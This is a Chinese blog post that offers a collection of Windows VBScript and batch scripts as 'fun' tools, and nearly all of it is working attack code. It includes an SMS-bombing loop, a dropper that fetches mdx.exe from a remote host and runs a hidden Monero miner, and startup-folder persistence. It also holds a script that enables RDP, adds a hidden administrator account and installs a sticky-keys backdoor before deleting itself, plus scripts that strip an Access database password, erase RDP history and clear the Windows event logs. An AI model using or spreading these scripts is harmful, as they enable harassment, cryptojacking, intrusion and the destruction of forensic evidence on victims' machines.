各种有趣vbs,bat脚本

短信轰炸.vbs

Dim btn,ie
Set ie = WScript.CreateObject("InternetExplorer.Application")
ie.Visible = true    '若为false,则不显示浏览器
ie.navigate "http://www.dooccn.com/php7/#id/53e57045ca9d15fe"   'http://www.dooccn.com/php7/#id/f16690b98a87d61c72e8a09fac740a53进去把15555555555换成你想要炸的号码,然后点击分享当前代码。把分享代码的连接复制进目标连接就OK了
Do                    'Do Loop 是一个循环结构
Do
Wscript.Sleep 200
Loop Until ie.readyState = 4    '等页面载入完整再填登录数据登录
Set btn =ie.Document.getElementById("btn")
btn.click
Wscript.Sleep 5000     '每隔五秒轰炸一次
Loop

门罗币挖矿.vbs

Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP") 
objXMLHTTP.open "GET","http://xxx.xxx.xxx.xxx/mdx.exe",false '后台下载挖矿软件mdx.exe
objXMLHTTP.send()
If objXMLHTTP.Status=200 Then
Set objADOStream=CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type=1 
objADOzStream.Write objXMLHTTP.ResponseBody
objADOStream.Position=0 
objADOStream.SaveToFile "mdx.exe"
objADOStream.Close
Set objADOStream=Nothing
End if
Set objXMLHTTP=Nothing
Set objShell=CreateObject("WScript.Shell")               '后台挖矿
objShell.Run"mdx.exe -o stratum+tcp://xxxxxxxx.com:3333 -u 46E9UkTFqALXNh2mSbAfskfsVgUgPVdT9ZdtweLRvAhWmbvuY1dh5ZRb4qJzFXLVHGYH4moQ -p x",0,TRUE

开机自启.vbs

dim fso,ws,pt,msg   '把这个加到你vbs的最前面
set fso = createobject("scripting.filesystemobject")
set ws = createobject("wscript.shell")
set file = fso.getfile(wscript.scriptfullname)
pt = ws.specialfolders("startup")&"\"
file.copy pt
sub Close_Process(ProcessName)
On Error Resume Next
end sub

开3389+非net创建管理用户+Shift后门+自删除脚本.vbs

on error resume next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_ 
strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
on error resume next
dim username,password:If Wscript.Arguments.Count  Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="0x7863$":password="3253220":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath
On Error Resume Next
Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F&copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe&copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)

BY:c32 QQȺ:43910940  

BLOG:www.19aq.com

 

 

去密码.vbs

Set args = WScript.Arguments
if args.count<>1 then msgbox "db.mdb":wscript.quit
Set conn =CreateObject("ADODB.Connection")
pwd=""&chr(13)&chr(9)&chr(10)&""&chr(2)
connStr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & args(0)&" ;Mode=Share Deny Read|Share Deny Write;Persist Security Info=False;Jet OLEDB:Database Password="&pwd&";"
conn.open connstr
conn.execute("ALTER DATABASE Password [123456] ["&pwd&"]")
conn.close
msgbox "done"

 清除3389远程桌面连接痕迹.bat

@echo off
@reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
@del "%USERPROFILE%\My Documents\Default.rdp" /a
@exit

 清除日志.bat

@echo off
choice /t 60 /d y /n >nul      '延迟60秒执行
echo
on error resume next>clear.vbs echo set wmi_clear=getobject("winmgmts:\\.\root\cimv2")>>clear.vbs echo dim lianan_names(2)>>clear.vbs echo lianan_names(0)="application">>clear.vbs echo lianan_names(1)="security">>clear.vbs echo lianan_names(2)="system">>clear.vbs echo for each lianan_name in lianan_names>>clear.vbs echo set lianan_logs=wmi_clear.execquery("select * from win32_nteventlogfile where logfilename='"^&lianan_name^&"'")>>clear.vbs echo for each lianan_log in lianan_logs>>clear.vbs echo lianan_log.cleareventlog()>>clear.vbs echo next>>clear.vbs echo next>>clear.vbs clear.vbs del /f /q clear.vbs del %0 '删除本身 exit

 

posted @ 2018-04-22 12:41  左小龙  阅读(12855)  评论(0编辑  收藏  举报